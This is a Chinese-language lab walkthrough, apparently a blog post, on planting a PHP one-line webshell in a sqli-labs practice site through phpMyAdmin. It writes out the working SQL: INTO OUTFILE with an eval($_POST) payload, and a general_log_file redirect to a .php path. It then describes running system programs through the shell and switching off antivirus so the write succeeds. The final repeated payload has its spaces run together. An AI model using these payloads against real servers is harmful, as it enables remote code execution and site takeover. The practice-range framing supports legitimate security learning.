安装phpMyAdmin,使用into outfile给靶场写入一句话木马

• 安装phpmyadmin

打开小皮面板---软件管理----点击安装
配置好之后，网页输入地址访问，登录默认是mysql的账密
登录成功后，可以看到左侧数据库列表

Ok，现在成功登录phpmyadmin，下面需要三个条件：

首先secure_file_priv是否为空，通过sql语句

show global variables like '%secure%'

查看日志权限是否开启：(默认是OFF)

show VARIABLES LIKE '%gen%'

开启日志权限：

set GLOBAL general_log = on

通过构建sql写入一句话木马：

SELECT 1,2,  '<?php @eval($_POST["cmd"])?>' INTO OUTFILE 'C:\\phpStudy\\phpstudy_pro\\WWW\\sqli-labs-master\\phpMyAdmin4.8.5\\test_webshell.php' ;

更改日志路径：
set global general_log_file = 'C:\\phpStudy\\phpstudy_pro\\WWW\\shell_log.php';

执行sql语句：
select '<?php @eval($_POST["cmd"])?>'

 查看日志成功记录了一句话木马

执行木马程序，获取网站绝对路径：

通过phpinfo页面中Document_Root参数获取网站绝对路径

fan作为变量来引用，重新写一个php文件进去
SELECT 1,2,  '<?php @eval($_POST["fan"])?>' INTO OUTFILE 'C:\\phpStudy\\phpstudy_pro\\WWW\\sqli-labs-master\\test_webshell3.php' ;
使用sqli-labs-master第一关

查看测试php文件：

打开计算器

打开设备管理器

打开虚拟键盘：

Cmd命令大全参考一下链接：

http://t.csdnimg.cn/SZVqf

放在最后，这种写入的方式会出发杀毒软件进行拦截，关闭杀毒软件就可以正常写入

SELECT1,2,'<?php@eval($_POST["cmd"])?>'INTOOUTFILE'C:\\phpStudy\\phpstudy_pro\\WWW\\sqli-labs-master\\phpMyAdmin4.8.5\\test_webshell.php'